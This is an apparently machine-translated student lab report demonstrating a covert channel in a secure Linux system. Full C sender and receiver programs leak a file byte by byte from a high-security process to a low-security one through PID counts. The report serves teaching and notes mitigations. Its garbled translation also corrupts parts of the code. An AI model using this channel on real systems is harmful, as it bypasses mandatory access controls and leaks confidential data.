Ansune Stealth channel scenario for secure operating system demo "process identifier Channel"

First, the purpose of the experiment

1. Familiar with the operating environment of Ansune safe operating system

2. How to work with covert channels

Ii. contents of the experiment

1. Finish writing, compiling, and executing the Send and receive programs

2. Demonstrates the existence of a covert channel scenario:

III. Experimental process and results
(1) Test preparation

1. Boot to the secure core seclinux before the covert channel is processed

2. Create two users the security category for User_h and User_l,user_h includes user_l security, user_h a security level higher than the user_l security level. In addition, set the user home directory security level is the same as the user security level, the two user home directory discretionary access control permissions, that is, through the chmod command to set their permissions to 0777, allowing U,g,o to read, write and execute.

3. Check the safety of Seclinux:

Advanced users can read low-security files, but they cannot create low-security files or pass information down through copies. Low-level users cannot read high-security files.

(2) selected covert channel: Process descriptor Channel
Channel Name:

Process Identifier Channel

Channel Type:

Persistent variable type

Mediation Variables:

Last_pid

Conditions of existence:

All processes in the system share the same process identifier list. Regardless of the security policy adopted by the system, both the high-security process and the low-security process share this list, and the value of the currently available process identifier channel can be learned by establishing a child process. If the system's process identifier channel table is clean, that is, no other process consumes the process Identifier channel table, the high and low processes can understand the performance of other processes based on the growth of the process identifier channel.

Sender Action:

The sender reads the confidential file, and then, based on the ASIIC code of the current byte of the content, determines the number of child processes to be created, and after the receiver reads the information, the child processes are deleted.

Accept-Side action:

Create a child process, get the current process identifier channel, and then compare the process identifier channel that was created with the last child process to know the number of child processes created by other processes. Explain the information you get.

Noise situation:

High noise. Any other process that exists in the system can create child processes, causing the receiver to interpret the resulting information incorrectly. If you reschedule the message when other users are not working (like 12 o'clock Midnight), you may get a larger bandwidth.

Bandwidth estimation:

Up to 160 bits per second.

Treatment measures:

The process randomly creates a child process using the randomization process identifier channel or joining the Idle process.

Tag variables:

Cc_pid

(3) Synchronization mechanism

Synchronization is manufactured using sleep (seconds)/usleep (microseconds).

When a process is sleep, it gives control of the CPU to other processes until the sleep time has passed and regain control of the CPU.

This synchronization technique is easy to implement and suitable for presentation.

However, because the process takes different times to send different characters, and the sleep time is fixed and cannot be changed while the program is running, this synchronization inevitably results in wasted time.

(4) Experimental results

As shown, the left side is the sending side cc_sender, the right side is the receiving end of Cc_receiver, the sender from the same directory Sender_text.txt file to obtain the sending data, through the covert channel sent to the receiving end, the receiving end to the data saved to the same directory Receiver_ In the Text.txt file, the data stored in the send-side file is ABCDEFG.

From the content that can be seen receiver_text.txt, it can be seen that the 7 characters ABCDEFG are transmitted correctly.

(5) Source code of the sending side

#include <unistd.h> #include <stdio.h> #include <stdlib.h>void sendchar (char ch); int main () {char ch; File *fp;int i;if ((fp = fopen ("./sender_text.txt", "r")) = = NULL)//open files to be sent {printf ("fopen error.\n"); exit (0);} while ((ch = fgetc (fp)) = EOF) {sendchar (ch);//every 2 seconds each character is sent Chsleep (2);} Fclose (FP);    return 0;} void Sendchar (char ch)//character send function, by creating a CH process representing the send character ch, these processes last for 2 seconds {pid_t fpid;//fpid represents the value returned by the fork function int i;int count = (int) ch; printf ("***************************************************\n");p rintf ("Sending [%c], new pid count = [%d].\n", CH, count); for (i = 0; i < count; i++)//Parent process continuously creates ch child process {fpid = fork (); if (Fpid < 0) {printf ("fork error.\n");} else if (Fpid = = 0) {printf ("Sending [%c], last_pid =%d.\n", ch, getpid ()); Sleep (2);//These sub-processes exit exit (0) for 2 seconds;}}

(6) Source code of the receiving end

#include <unistd.h> #include <stdio.h> #include <stdlib.h>int bstart = 0;void writetofile (char ch); Char Receivechar (); int main () {char ch;int i;remove ("./receiver_text.txt");//Delete the previously accepted file while (((ch = Receivechar ())! = ( char) 0) | | bstart = = 0) {//every 2 seconds accept the character if (bstart = = 0) {printf ("not start.\n"),//bstart 0 means the sending end has not started sending}else{printf ("Write [%c] to file. \ n ", ch); Receive send-side send character chwritetofile (CH); Write ch to the receiving file}}printf ("end.\n"); return 0;} void WriteToFile (char ch)//writes CH to the receive file {file *fp;if (fp = fopen ("./receiver_text.txt", "a") = = NULL) {printf ("fopen error. \ n "); exit (0);} FPUTC (CH, FP); fclose (FP);} Char Receivechar ()//Receive character function, with a PID difference of 2 seconds to denote the received character {pid_t fpid1, Fpid2;//fpid1, FPID2 indicates the value returned by the fork function int Idiff;char ch;printf (" \ n ");p rintf (" receiving round begins.\n "); fpid1 = fork (); if ( Fpid1 < 0) {printf ("fork error.\n");} else if (Fpid1 = = 0) {exit (0);} Sleep (2); fpid2 = fork (); if (Fpid2 < 0) {printf ("fork error.\n");} else if (Fpid2 = = 0) {exit(0);} Idiff = fpid2-fpid1-1; Since the first fork takes up a PID, the difference needs to be reduced by 1ch = (char) idiff;if (Idiff < 30)//Because there may be other new processes, causing the receiver to mistakenly think the sending side is sent, so it needs to be judged at less than 30 o'clock, we think it is error {printf ("receiving round ends. Pid_diff = [%d], data is [%c]\n], Idiff, ch); return (char) 0;} Else{if (bstart = = 0)//first time receiving, because the sender itself is a process, also occupies a PID, so need to reduce the 1{idiff--;ch--;} printf ("Receiving round ends. Pid_diff = [%d], data is [%c]\n ", Idiff, ch); bstart = 1; Update the identity, indicating that it is not the first time to receive the return ch;}}

Iv. Summary of the experiment
Experiment Harvest:

Learned a lot of covert channel knowledge, but also more familiar with the Ansune operating system command usage.

Summarize the problems encountered in the experimental process and solutions:

The development of the C language program in Linux does not use the IDE, programming is very inconvenient.

Solution:

Shared with Samba in Linux, the C language code in Linux is shared with Windows so that the source code can be edited with professional Ides such as Visual Studio under Windows, ensuring that coding is done efficiently. After the encoding is complete, use the Linux SCP tool for file transfer, as shown in:

Ansune Stealth channel scenario for secure operating system demo "process identifier Channel"